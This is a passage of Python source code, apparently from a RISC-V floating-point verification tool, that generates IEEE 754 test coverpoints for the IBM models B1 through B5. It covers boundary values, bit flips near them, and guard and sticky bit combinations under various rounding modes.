basic_types = fzero + fminsubnorm + [fsubnorm[0], fsubnorm[3]] +\
fmaxsubnorm + fminnorm + [fnorm[0], fnorm[3]] + fmaxnorm + \
finfinity + fdefaultnan + [fqnan[0], fqnan[3]] + \
[fsnan[0], fsnan[3]] + fone
elif flen == 64:
basic_types = dzero + dminsubnorm + [dsubnorm[0], dsubnorm[1]] +\
dmaxsubnorm + dminnorm + [dnorm[0], dnorm[1]] + dmaxnorm + \
dinfinity + ddefaultnan + [dqnan[0], dqnan[1]] + \
[dsnan[0], dsnan[1]] + done
else:
logger.error('Invalid flen value!')
sys.exit(1)
# the following creates a cross product for ops number of variables
b1_comb = list(itertools.product(*ops*[basic_types]))
coverpoints = []
for c in b1_comb:
cvpt = ""
for x in range(1, ops+1):
# cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
cvpt += (extract_fields(flen,c[x-1],str(x)))
cvpt += " and "
if opcode.split('.')[0] in ["fadd","fsub","fmul","fdiv","fsqrt","fmadd","fnmadd","fmsub","fnmsub","fcvt","fmv","fle","fmv","fmin","fsgnj"]:
cvpt += 'rm_val == 0'
elif opcode.split('.')[0] in ["fclass","flt","fmax","fsgnjn"]:
cvpt += 'rm_val == 1'
elif opcode.split('.')[0] in ["feq","flw","fsw","fsgnjx"]:
cvpt += 'rm_val == 2'
cvpt += ' # '
for y in range(1, ops+1):
cvpt += 'rs'+str(y)+'_val=='
cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
if(y != ops):
cvpt += " and "
coverpoints.append(cvpt)
mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
(str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B1 for '+opcode+' !'
logger.info(mess)
coverpoints = comments_parser(coverpoints)
return coverpoints
def ibm_b2(flen, opcode, ops, int_val = 100, seed = -1):
'''
IBM Model B2 Definition:
This model tests final results that are very close, measured in Hamming
distance, to the specified boundary values. Each boundary value is taken as a
base value, and the model enumerates over small deviations from the base, by
flipping one bit of the significand.
:param flen: Size of the floating point registers
:param opcode: Opcode for which the coverpoints are to be generated
:param ops: No. of Operands taken by the opcode
:param int_val: Number to define the range in which the random value is to be generated. (Predefined to 100)
:param seed: Initial seed value of the random library. (Predefined to -1. Actual value is set with respect to the opcode calling the function)
:type flen: int
:type opcode: str
:type ops: int
:type int_val: int
:param seed: int
Abstract Dataset Description:
Final Results = [Zero, One, MinSubNorm, MaxSubNorm, MinNorm, MaxNorm]
Operand1 {operation} Operand2 = Final Results
Implementation:
- Hamming distance is calculated using an xor operation between a number in the dataset and a number generated using walking ones operation.
- A random operand value for one of the operands is assigned and based on the result and operation under consideration, the next operand is calculated.
- These operand values are treated as decimal numbers until their derivation after which they are converted into their respective IEEE754 hexadecimal floating point formats using the “floatingPoint_tohex” function.
- The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
- Coverpoints are then appended with the respective rounding mode for that particular opcode.
'''
if flen == 32:
flip_types = fzero + fone + fminsubnorm + fmaxsubnorm + fminnorm + fmaxnorm
b = '0x00000010'
e_sz=8
m_sz = 23
elif flen == 64:
flip_types = dzero + done + dminsubnorm + dmaxsubnorm + dminnorm + dmaxnorm
b = '0x0000000000000010'
e_sz=11
m_sz = 52
result = []
b2_comb = []
opcode = opcode.split('.')[0]
if seed == -1:
if opcode in 'fadd':
random.seed(0)
elif opcode in 'fsub':
random.seed(1)
elif opcode in 'fmul':
random.seed(2)
elif opcode in 'fdiv':
random.seed(3)
elif opcode in 'fsqrt':
random.seed(4)
elif opcode in 'fmadd':
random.seed(5)
elif opcode in 'fnmadd':
random.seed(6)
elif opcode in 'fmsub':
random.seed(7)
elif opcode in 'fnmsub':
random.seed(8)
else:
random.seed(seed)
for i in range(len(flip_types)):
k=1
for j in range (1,24):
#print('{:010b}'.format(k))
result.append(['0x'+hex(eval(bin(int('1'+flip_types[i][2:], 16))) ^ eval('0b'+'{:023b}'.format(k)))[3:],' | Result = '+num_explain(flen, '0x'+str(hex(eval(bin(int('1'+flip_types[i][2:], 16))))[3:]))+'(0x'+str(hex(eval(bin(int('1'+flip_types[i][2:], 16))))[3:])+')^'+str('0x'+hex(eval('0b'+'1'+'{:024b}'.format(k)))[3:])])
k=k*2
for i in range(len(result)):
bin_val = bin(int('1'+result[i][0][2:],16))[3:]
rsgn = bin_val[0]
rexp = bin_val[1:e_sz+1]
rman = bin_val[e_sz+1:]
rs1_exp = rs3_exp = rexp
rs1_bin = bin(random.randrange(1,int_val))
rs3_bin = bin(random.randrange(1,int_val))
rs1_bin = ('0b0'+rexp+('0'*(m_sz-(len(rs1_bin)-2)))+rs1_bin[2:])
rs3_bin = ('0b0'+rexp+('0'*(m_sz-(len(rs3_bin)-2)))+rs3_bin[2:])
rs1 = fields_dec_converter(flen,'0x'+hex(int('1'+rs1_bin[2:],2))[3:])
rs3 = fields_dec_converter(flen,'0x'+hex(int('1'+rs3_bin[2:],2))[3:])
if opcode in 'fadd':
rs2 = fields_dec_converter(flen,result[i][0]) - rs1
elif opcode in 'fsub':
rs2 = rs1 - fields_dec_converter(flen,result[i][0])
elif opcode in 'fmul':
rs2 = fields_dec_converter(flen,result[i][0])/rs1
elif opcode in 'fdiv':
if fields_dec_converter(flen,result[i][0]) != 0:
rs2 = rs1/fields_dec_converter(flen,result[i][0])
elif opcode in 'fsqrt':
rs2 = fields_dec_converter(flen,result[i][0])*fields_dec_converter(flen,result[i][0])
elif opcode in 'fmadd':
rs2 = (fields_dec_converter(flen,result[i][0]) - rs3)/rs1
elif opcode in 'fnmadd':
rs2 = (rs3 - fields_dec_converter(flen,result[i][0]))/rs1
elif opcode in 'fmsub':
rs2 = (fields_dec_converter(flen,result[i][0]) + rs3)/rs1
elif opcode in 'fnmsub':
rs2 = -1*(rs3 + fields_dec_converter(flen,result[i][0]))/rs1
if(flen==32):
m = struct.unpack('f', struct.pack('f', rs2))[0]
elif(flen==64):
m = rs2
if opcode in ['fadd','fsub','fmul','fdiv']:
b2_comb.append((floatingPoint_tohex(flen,rs1),floatingPoint_tohex(flen,m)))
elif opcode in 'fsqrt':
b2_comb.append((floatingPoint_tohex(flen,m),))
elif opcode in ['fmadd','fnmadd','fmsub','fnmsub']:
b2_comb.append((floatingPoint_tohex(flen,rs1),floatingPoint_tohex(flen,m),floatingPoint_tohex(flen,rs3)))
#print("b2_comb",b2_comb)
coverpoints = []
k=0
for c in b2_comb:
cvpt = ""
for x in range(1, ops+1):
# cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
cvpt += (extract_fields(flen,c[x-1],str(x)))
cvpt += " and "
cvpt += 'rm_val == 0'
cvpt += ' # '
for y in range(1, ops+1):
cvpt += 'rs'+str(y)+'_val=='
cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
if(y != ops):
cvpt += " and "
cvpt += result[k][1]
coverpoints.append(cvpt)
k=k+1
mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
(str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B2 for '+opcode+' !'
logger.info(mess)
coverpoints = comments_parser(coverpoints)
return coverpoints
def ibm_b3(flen, opcode, ops, seed=-1):
'''
IBM Model B3 Definition:
This model tests all combinations of the sign, significand’s LSB, guard bit & sticky bit of the intermediate result.
:param flen: Size of the floating point registers
:param opcode: Opcode for which the coverpoints are to be generated
:param ops: No. of Operands taken by the opcode
:param seed: Initial seed value of the random library. (Predefined to -1. Actual value is set with respect to the opcode calling the function)
:type flen: int
:type opcode: str
:type ops: int
:param seed: int
Abstract Dataset Description:
Intermediate Result is chosen at random
Intermediate Result = [All possible combinations of Sign, LSB, Guard and Sticky are taken]
Operand1 {operation} Operand2 = Intermediate Results
Implementation:
- The Sticky bit is 1 if there were non-zero digits to the right of the guard digit, hence the lsb list is subjected to that condition.
- Float_val [ a list of numbers ] extracted from the fields_dec_converter is checked for the LSB. If it is a negative number, then the list ieee754_num is appended with splitting the p character and first 10 characters in the 0th split + ‘p’ + other part of the split. “p” specifies the maximum available number in python and used in 64 bit architecture. If we require a digit more than thea number, then we represent it using a string because an int
- Now the ir_dataset is initialized and since the ieee754_num list has the same element twice [ first is just the number and second is with sign ], hence we loop that array, considering only multiples of 2 elements from it. If the sign is ‘-’, then then the index is updated with 1 else if it is ‘+’, then it is updated with 0 complying with the IEEE standards.
- The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
- Coverpoints are then appended with all rounding modes for that particular opcode.
'''
opcode = opcode.split('.')[0]
getcontext().prec = 40
if seed == -1:
if opcode in 'fadd':
random.seed(0)
elif opcode in 'fsub':
random.seed(1)
elif opcode in 'fmul':
random.seed(2)
elif opcode in 'fdiv':
random.seed(3)
elif opcode in 'fsqrt':
random.seed(4)
elif opcode in 'fmadd':
random.seed(5)
elif opcode in 'fnmadd':
random.seed(6)
elif opcode in 'fmsub':
random.seed(7)
elif opcode in 'fnmsub':
random.seed(8)
else:
random.seed(seed)
if flen == 32:
ieee754_maxnorm = '0x1.7fffffp+127'
maxnum = float.fromhex(ieee754_maxnorm)
ieee754_num = []
lsb = []
for i in fsubnorm+fnorm:
if int(i[-1],16)%2 == 1:
lsb.append('1')
lsb.append('1')
else:
lsb.append('0')
lsb.append('0')
float_val = float.hex(fields_dec_converter(32,i))
if float_val[0] != '-':
ieee754_num.append(float_val.split('p')[0][0:10]+'p'+float_val.split('p')[1])
ieee754_num.append('-'+float_val.split('p')[0][0:10]+'p'+float_val.split('p')[1])
else:
ieee754_num.append(float_val.split('p')[0][0:11]+'p'+float_val.split('p')[1])
ieee754_num.append(float_val.split('p')[0][1:11]+'p'+float_val.split('p')[1])
ir_dataset = []
for k in range(len(ieee754_num)):
for i in range(2,16,2):
grs = '{:04b}'.format(i)
if ieee754_num[k][0] == '-': sign = '1'
else: sign = '0'
ir_dataset.append([ieee754_num[k].split('p')[0]+str(i)+'p'+ieee754_num[k].split('p')[1],' | Guard = '+grs[0]+' Sticky = '+grs[2]+' Sign = '+sign+' LSB = '+lsb[k]])
for i in range(len(ir_dataset)):
ir_dataset[i][0] = float.fromhex(ir_dataset[i][0])
elif flen == 64:
maxdec = '1.7976931348623157e+308'
maxnum = float.fromhex('0x1.fffffffffffffp+1023')
ieee754_num = []
lsb = []
for i in dsubnorm+dnorm:
if int(i[-1],16)%2 == 1:
lsb.append('1')
lsb.append('1')
else:
lsb.append('0')
lsb.append('0')
float_val = str(fields_dec_converter(64,i))
if float_val[0] != '-':
ieee754_num.append(float_val)
ieee754_num.append('-'+float_val)
else:
ieee754_num.append(float_val)
ieee754_num.append(float_val[1:])
ir_dataset = []
for k in range(len(ieee754_num)):
for i in range(2,16,2):
grs = '{:04b}'.format(i)
if ieee754_num[k][0] == '-': sign = '1'
else: sign = '0'
ir_dataset.append([str(Decimal(ieee754_num[k].split('e')[0])+Decimal(pow(i*16,-14)))+'e'+ieee754_num[k].split('e')[1],' | Guard = '+grs[0]+' Sticky = '+grs[2]+' Sign = '+sign+' LSB = '+lsb[k]])
b4_comb = []
for i in range(len(ir_dataset)):
rs1 = random.uniform(1,maxnum)
rs3 = random.uniform(1,maxnum)
if opcode in 'fadd':
if flen == 32:
rs2 = ir_dataset[i][0] - rs1
elif flen == 64:
rs2 = Decimal(ir_dataset[i][0]) - Decimal(rs1)
elif opcode in 'fsub':
if flen == 32:
rs2 = rs1 - ir_dataset[i][0]
elif flen == 64:
rs2 = Decimal(rs1) - Decimal(ir_dataset[i][0])
elif opcode in 'fmul':
if flen == 32:
rs2 = ir_dataset[i][0]/rs1
elif flen == 64:
rs2 = Decimal(ir_dataset[i][0])/Decimal(rs1)
elif opcode in 'fdiv':
if flen == 32:
rs2 = rs1/ir_dataset[i][0]
elif flen == 64:
rs2 = Decimal(rs1)/Decimal(ir_dataset[i][0])
elif opcode in 'fsqrt':
if flen == 32:
rs2 = ir_dataset[i][0]*ir_dataset[i][0]
elif flen == 64:
rs2 = Decimal(ir_dataset[i][0])*Decimal(ir_dataset[i][0])
elif opcode in 'fmadd':
if flen == 32:
rs2 = (ir_dataset[i][0] - rs3)/rs1
elif flen == 64:
rs2 = (Decimal(ir_dataset[i][0]) - Decimal(rs3))/Decimal(rs1)
elif opcode in 'fnmadd':
if flen == 32:
rs2 = (rs3 - ir_dataset[i][0])/rs1
elif flen == 64:
rs2 = (Decimal(rs3) - Decimal(ir_dataset[i][0]))/Decimal(rs1)
elif opcode in 'fmsub':
if flen == 32:
rs2 = (ir_dataset[i][0] + rs3)/rs1
elif flen == 64:
rs2 = (Decimal(ir_dataset[i][0]) + Decimal(rs3))/Decimal(rs1)
elif opcode in 'fnmsub':
if flen == 32:
rs2 = -1*(rs3 + ir_dataset[i][0])/rs1
elif flen == 64:
rs2 = -1*(Decimal(rs3) + Decimal(ir_dataset[i][0]))/Decimal(rs1)
if(flen==32):
x1 = struct.unpack('f', struct.pack('f', rs1))[0]
x2 = struct.unpack('f', struct.pack('f', rs2))[0]
x3 = struct.unpack('f', struct.pack('f', rs3))[0]
elif(flen==64):
x1 = rs1
x2 = rs2
x3 = rs3
if opcode in ['fadd','fsub','fmul','fdiv']:
b4_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2))))
elif opcode in 'fsqrt':
b4_comb.append((floatingPoint_tohex(flen,float(rs2)),))
elif opcode in ['fmadd','fnmadd','fmsub','fnmsub']:
b4_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2)),floatingPoint_tohex(flen,float(rs3))))
coverpoints = []
k = 0
for c in b4_comb:
for rm in range(5):
cvpt = ""
for x in range(1, ops+1):
# cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
cvpt += (extract_fields(flen,c[x-1],str(x)))
cvpt += " and "
cvpt += 'rm_val == '+str(rm)
cvpt += ' # '
for y in range(1, ops+1):
cvpt += 'rs'+str(y)+'_val=='
cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
if(y != ops):
cvpt += " and "
cvpt += ir_dataset[k][1]
coverpoints.append(cvpt)
k=k+1
mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
(str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B3 for '+opcode+' !'
logger.info(mess)
coverpoints = comments_parser(coverpoints)
return coverpoints
def ibm_b4(flen, opcode, ops, seed=-1):
'''
IBM Model B4 Definition:
This model creates a test-case for each of the following constraints on the
intermediate results:
1. All the numbers in the range [+MaxNorm – 3 ulp, +MaxNorm + 3 ulp]
2. All the numbers in the range [-MaxNorm - 3 ulp, -MaxNorm + 3 ulp]
3. A random number that is larger than +MaxNorm + 3 ulp
4. A random number that is smaller than -MaxNorm – 3 ulp
5. One number for every exponent in the range [MaxNorm.exp - 3, MaxNorm.exp + 3] for positive and negative numbers
:param flen: Size of the floating point registers
:param opcode: Opcode for which the coverpoints are to be generated
:param ops: No. of Operands taken by the opcode
:param seed: Initial seed value of the random library. (Predefined to -1. Actual value is set with respect to the opcode calling the function)
:type flen: int
:type opcode: str
:type ops: int
:param seed: int
Abstract Dataset Description:
Intermediate Results = [[MaxNorm-3 ulp, MaxNorm+3 ulp], [-MaxNorm-3 ulp, -MaxNorm+3 ulp], Random Num > MaxNorm+3 ulp, Random Num < -MaxNorm-3 ulp, [MaxNorm.exp-3, MaxNorm.exp+3]]
Operand1 {operation} Operand2 = Intermediate Results
Implementation:
- The intermediate results dataset is populated in accordance with the abstract dataset defined above.
- Intermediate results can be out of the range of what is representable in the specified format; they should only be viewed numerically. Inorder to represent numbers that went out of range of the maximum representable number in python, the “Decimal” module was utilized.
- These operand values are treated as decimal numbers until their derivation after which they are converted into their respective IEEE754 hexadecimal floating point formats using the “floatingPoint_tohex” function.
'''
opcode = opcode.split('.')[0]
getcontext().prec = 40
if seed == -1:
if opcode in 'fadd':
random.seed(0)
elif opcode in 'fsub':
random.seed(1)
elif opcode in 'fmul':
random.seed(2)
elif opcode in 'fdiv':
random.seed(3)
elif opcode in 'fsqrt':
random.seed(4)
elif opcode in 'fmadd':
random.seed(5)
elif opcode in 'fnmadd':
random.seed(6)
elif opcode in 'fmsub':
random.seed(7)
elif opcode in 'fnmsub':
random.seed(8)
else:
random.seed(seed)
if flen == 32:
ieee754_maxnorm_p = '0x1.7fffffp+127'
ieee754_maxnorm_n = '0x1.7ffffep+127'
maxnum = float.fromhex(ieee754_maxnorm_p)
ir_dataset = []
for i in range(2,16,2):
grs = '{:04b}'.format(i)
ir_dataset.append([ieee754_maxnorm_p.split('p')[0]+str(i)+'p'+ieee754_maxnorm_p.split('p')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> Maxnorm + '+str(int(grs[0:3],2))+' ulp'])
ir_dataset.append([ieee754_maxnorm_n.split('p')[0]+str(i)+'p'+ieee754_maxnorm_n.split('p')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> Maxnorm - '+str(int(grs[0:3],2))+' ulp'])
for i in range(-3,4):
ir_dataset.append([ieee754_maxnorm_p.split('p')[0]+'p'+str(127+i),' | Exponent = '+str(127+i)+' Number = +ve'])
ir_dataset.append(['-'+ieee754_maxnorm_n.split('p')[0]+'p'+str(127+i),' | Exponent = '+str(127+i)+' Number = -ve'])
for i in range(len(ir_dataset)):
ir_dataset[i][0] = float.fromhex(ir_dataset[i][0])
elif flen == 64:
maxnum = float.fromhex('0x1.fffffffffffffp+1023')
maxdec_p = str(maxnum)
maxdec_n = str(float.fromhex('0x1.ffffffffffffep+1023'))
ir_dataset = []
for i in range(2,16,2):
grs = '{:04b}'.format(i)
ir_dataset.append([str(Decimal(maxdec_p.split('e')[0])+Decimal(pow(i*16,-14)))+'e'+maxdec_p.split('e')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> Maxnorm + '+str(int(grs[0:3],2))+' ulp'])
ir_dataset.append([str(Decimal(maxdec_n.split('e')[0])+Decimal(pow(i*16,-14)))+'e'+maxdec_n.split('e')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> Maxnorm - '+str(int(grs[0:3],2))+' ulp'])
for i in range(-3,4):
ir_dataset.append([str(random.uniform(1,maxnum)).split('e')[0]+'e'+str(int(math.log(pow(2,1023+i),10))),' | Exponent = '+str(1023+i)+' Number = +ve'])
ir_dataset.append([str(-1*random.uniform(1,maxnum)).split('e')[0]+'e'+str(int(math.log(pow(2,1023+i),10))),' | Exponent = '+str(1023+i)+' Number = -ve'])
b4_comb = []
for i in range(len(ir_dataset)):
rs1 = random.uniform(1,maxnum)
rs3 = random.uniform(1,maxnum)
if opcode in 'fadd':
if flen == 32:
rs2 = ir_dataset[i][0] - rs1
elif flen == 64:
rs2 = Decimal(ir_dataset[i][0]) - Decimal(rs1)
elif opcode in 'fsub':
if flen == 32:
rs2 = rs1 - ir_dataset[i][0]
elif flen == 64:
rs2 = Decimal(rs1) - Decimal(ir_dataset[i][0])
elif opcode in 'fmul':
if flen == 32:
rs2 = ir_dataset[i][0]/rs1
elif flen == 64:
rs2 = Decimal(ir_dataset[i][0])/Decimal(rs1)
elif opcode in 'fdiv':
if flen == 32:
rs2 = rs1/ir_dataset[i][0]
elif flen == 64:
rs2 = Decimal(rs1)/Decimal(ir_dataset[i][0])
elif opcode in 'fsqrt':
if flen == 32:
rs2 = ir_dataset[i][0]*ir_dataset[i][0]
elif flen == 64:
rs2 = Decimal(ir_dataset[i][0])*Decimal(ir_dataset[i][0])
elif opcode in 'fmadd':
if flen == 32:
rs2 = (ir_dataset[i][0] - rs3)/rs1
elif flen == 64:
rs2 = (Decimal(ir_dataset[i][0]) - Decimal(rs3))/Decimal(rs1)
elif opcode in 'fnmadd':
if flen == 32:
rs2 = (rs3 - ir_dataset[i][0])/rs1
elif flen == 64:
rs2 = (Decimal(rs3) - Decimal(ir_dataset[i][0]))/Decimal(rs1)
elif opcode in 'fmsub':
if flen == 32:
rs2 = (ir_dataset[i][0] + rs3)/rs1
elif flen == 64:
rs2 = (Decimal(ir_dataset[i][0]) + Decimal(rs3))/Decimal(rs1)
elif opcode in 'fnmsub':
if flen == 32:
rs2 = -1*(rs3 + ir_dataset[i][0])/rs1
elif flen == 64:
rs2 = -1*(Decimal(rs3) + Decimal(ir_dataset[i][0]))/Decimal(rs1)
if(flen==32):
x1 = struct.unpack('f', struct.pack('f', rs1))[0]
x2 = struct.unpack('f', struct.pack('f', rs2))[0]
x3 = struct.unpack('f', struct.pack('f', rs3))[0]
elif(flen==64):
x1 = rs1
x2 = rs2
x3 = rs3
if opcode in ['fadd','fsub','fmul','fdiv']:
b4_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2))))
elif opcode in 'fsqrt':
b4_comb.append((floatingPoint_tohex(flen,float(rs2)),))
elif opcode in ['fmadd','fnmadd','fmsub','fnmsub']:
b4_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2)),floatingPoint_tohex(flen,float(rs3))))
coverpoints = []
k = 0
for c in b4_comb:
for rm in range(5):
cvpt = ""
for x in range(1, ops+1):
# cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
cvpt += (extract_fields(flen,c[x-1],str(x)))
cvpt += " and "
cvpt += 'rm_val == '+str(rm)
cvpt += ' # '
for y in range(1, ops+1):
cvpt += 'rs'+str(y)+'_val=='
cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
if(y != ops):
cvpt += " and "
cvpt += ir_dataset[k][1]
coverpoints.append(cvpt)
k=k+1
mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
(str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B4 for '+opcode+' !'
logger.info(mess)
coverpoints = comments_parser(coverpoints)
return coverpoints
def ibm_b5(flen, opcode, ops, seed=-1):
'''
IBM Model B5 Definition:
This model creates a test-case for each of the following constraints on the intermediate results:
1. All the numbers in the range [+MinSubNorm – 3 ulp, +MinSubNorm + 3 ulp]
2. All the numbers in the range [-MinSubNorm - 3 ulp, -MinSubNorm + 3 ulp]
3. All the numbers in the range [MinNorm – 3 ulp, MinNorm + 3 ulp]
4. All the numbers in the range [-MinSubNorm - 3 ulp, -MinSubNorm + 3 ulp]
5. All the numbers in the range [MinNorm – 3 ulp, MinNorm + 3 ulp]
6. All the numbers in the range [-MinNorm - 3 ulp, -MinNorm + 3 ulp]
7. A random number in the range (0, MinSubNorm)
8. A random number in the range (-MinSubNorm, -0)
9. One number for every exponent in the range [MinNorm.exp, MinNorm.exp + 5]
:param flen: Size of the floating point registers
:param opcode: Opcode for which the coverpoints are to be generated
:param ops: No. of Operands taken by the opcode
:param seed: Initial seed value of the random library. (Predefined to -1. Actual value is set with respect to the opcode calling the function)
:type flen: int
:type opcode: str
:type ops: int
:param seed: int
Abstract Dataset Description:
Intermediate Results = [+MinSubNorm – 3 ulp, +MinSubNorm + 3 ulp], [-MinSubNorm - 3 ulp, -MinSubNorm + 3 ulp] , [MinNorm – 3 ulp, MinNorm + 3 ulp] , [-MinNorm - 3 ulp, -MinNorm + 3 ulp] , Random Num in (0, MinSubNorm), Random Num in (-MinSubNorm, -0), One Num for every exp in [MinNorm.exp, MinNorm.exp + 5]]
Operand1 {operation} Operand2 = Intermediate Results
Implementation:
- The intermediate results dataset is populated in accordance with the abstract dataset defined above.
- Intermediate results can be out of the range of what is representable in the specified format; they should only be viewed numerically. Inorder to represent numbers that went out of range of the maximum representable number in python, the “Decimal” module was utilized.
- These operand values are treated as decimal numbers until their derivation after which they are converted into their respective IEEE754 hexadecimal floating point formats using the “floatingPoint_tohex” function.
- Coverpoints are then appended with all rounding modes for that particular opcode.
'''
opcode = opcode.split('.')[0]
getcontext().prec = 40
if flen == 32:
ieee754_maxnorm = '0x1.7fffffp+127'
maxnum = float.fromhex(ieee754_maxnorm)
ieee754_minsubnorm = '0x0.000001p-126'
ir_dataset = []
for i in range(0,16,2):
grs = '{:04b}'.format(i)
ir_dataset.append([ieee754_minsubnorm.split('p')[0]+str(i)+'p'+ieee754_minsubnorm.split('p')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> Minsubnorm + '+str(int(grs[0:3],2))+' ulp'])
ieee754_minnorm = '0x1.000000p-126'
for i in range(0,16,2):
grs = '{:04b}'.format(i)
ir_dataset.append([ieee754_minnorm.split('p')[0]+str(i)+'p'+ieee754_minnorm.split('p')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> Minnorm + '+str(int(grs[0:3],2))+' ulp'])
minnorm_Exp = ['0x1.000000p-126','0x1.000000p-125','0x1.000000p-124','0x1.000000p-123','0x1.000000p-122','0x1.000000p-121']
for i in minnorm_Exp:
ir_dataset.append([i,' | Exponent = MinNorm.exp + '+str(126+int(i.split('p')[1]))])
n = len(ir_dataset)
for i in range(n):
ir_dataset[i][0] = float.fromhex(ir_dataset[i][0])
ir_dataset.append([-1*ir_dataset[i][0],ir_dataset[i][1]])
elif flen == 64:
maxdec = '1.7976931348623157e+308'
maxnum = float.fromhex('0x1.fffffffffffffp+1023')
minsubdec = '5e-324'
ir_dataset = []
for i in range(2,16,2):
grs = '{:04b}'.format(i)
ir_dataset.append([str(Decimal(minsubdec.split('e')[0])+Decimal(pow(i*16,-14)))+'e'+minsubdec.split('e')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> Minsubnorm + '+str(int(grs[0:3],2))+' ulp'])
minnormdec = '2.2250738585072014e-308'
ir_dataset.append([minsubdec, ' | Guard = 0 Round = 0 Sticky = 0 --> Minsubnorm + 0 ulp'])
ir_dataset.append([minnormdec,' | Guard = 0 Round = 0 Sticky = 0 --> Minnorm + 0 ulp'])
for i in range(2,16,2):
grs = '{:04b}'.format(i)
ir_dataset.append([str(Decimal(minnormdec.split('e')[0])+Decimal(pow(i*16,-14)))+'e'+minnormdec.split('e')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> Minnorm + '+str(int(grs[0:3],2))+' ulp'])
minnorm_Exp = ['4.450147717014403e-308','8.900295434028806e-308','1.780059086805761e-307','3.560118173611522e-307','7.120236347223044e-307']
k = 1
for i in minnorm_Exp:
ir_dataset.append([i,' | Exponent = MinNorm.exp + '+str(k)])
k += 1
n = len(ir_dataset)
for i in range(n):
ir_dataset.append(['-'+ir_dataset[i][0],ir_dataset[i][1]])
if seed == -1:
if opcode in 'fadd':
random.seed(0)
elif opcode in 'fsub':
random.seed(1)
elif opcode in 'fmul':
random.seed(2)
elif opcode in 'fdiv':
random.seed(3)
elif opcode in 'fsqrt':
random.seed(4)
elif opcode in 'fmadd':
random.seed(5)
elif opcode in 'fnmadd':
random.seed(6)
elif opcode in 'fmsub':
random.seed(7)
elif opcode in 'fnmsub':
random.seed(8)
else:
random.seed(seed)
b5_comb = []
for i in range(len(ir_dataset)):
rs1 = random.uniform(1,maxnum)
rs3 = random.uniform(1,maxnum)
if opcode in 'fadd':
if flen == 32:
rs2 = ir_dataset[i][0] - rs1
elif flen == 64:
rs2 = Decimal(ir_dataset[i][0]) - Decimal(rs1)
elif opcode in 'fsub':
if flen == 32:
rs2 = rs1 - ir_dataset[i][0]
elif flen == 64:
rs2 = Decimal(rs1) - Decimal(ir_dataset[i][0])
elif opcode in 'fmul':
if flen == 32:
rs2 = ir_dataset[i][0]/rs1
elif flen == 64:
rs2 = Decimal(ir_dataset[i][0])/Decimal(rs1)
elif opcode in 'fdiv':
if flen == 32:
rs2 = rs1/ir_dataset[i][0]
elif flen == 64:
rs2 = Decimal(rs1)/Decimal(ir_dataset[i][0])
elif opcode in 'fsqrt':
if flen == 32:
rs2 = ir_dataset[i][0]*ir_dataset[i][0]
elif flen == 64:
rs2 = Decimal(ir_dataset[i][0])*Decimal(ir_dataset[i][0])
elif opcode in 'fmadd':
if flen == 32:
rs2 = (ir_dataset[i][0] - rs3)/rs1
elif flen == 64:
rs2 = (Decimal(ir_dataset[i][0]) - Decimal(rs3))/Decimal(rs1)
elif opcode in 'fnmadd':
if flen == 32:
rs2 = (rs3 - ir_dataset[i][0])/rs1
elif flen == 64:
rs2 = (Decimal(rs3) - Decimal(ir_dataset[i][0]))/Decimal(rs1)
elif opcode in 'fmsub':
if flen == 32:
rs2 = (ir_dataset[i][0] + rs3)/rs1
elif flen == 64:
rs2 = (Decimal(ir_dataset[i][0]) + Decimal(rs3))/Decimal(rs1)
elif opcode in 'fnmsub':
if flen == 32:
rs2 = -1*(rs3 + ir_dataset[i][0])/rs1
elif flen == 64:
rs2 = -1*(Decimal(rs3) + Decimal(ir_dataset[i][0]))/Decimal(rs1)
if(flen==32):
x1 = struct.unpack('f', struct.pack('f', rs1))[0]
x2 = struct.unpack('f', struct.pack('f', rs2))[0]
x3 = struct.unpack('f', struct.pack('f', rs3))[0]
elif(flen==64):
x1 = rs1
x2 = rs2
x3 = rs3
if opcode in ['fadd','fsub','fmul','fdiv']:
b5_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2))))
elif opcode in 'fsqrt':
b5_comb.append((floatingPoint_tohex(flen,float(rs2)),))
elif opcode in ['fmadd','fnmadd','fmsub','fnmsub']:
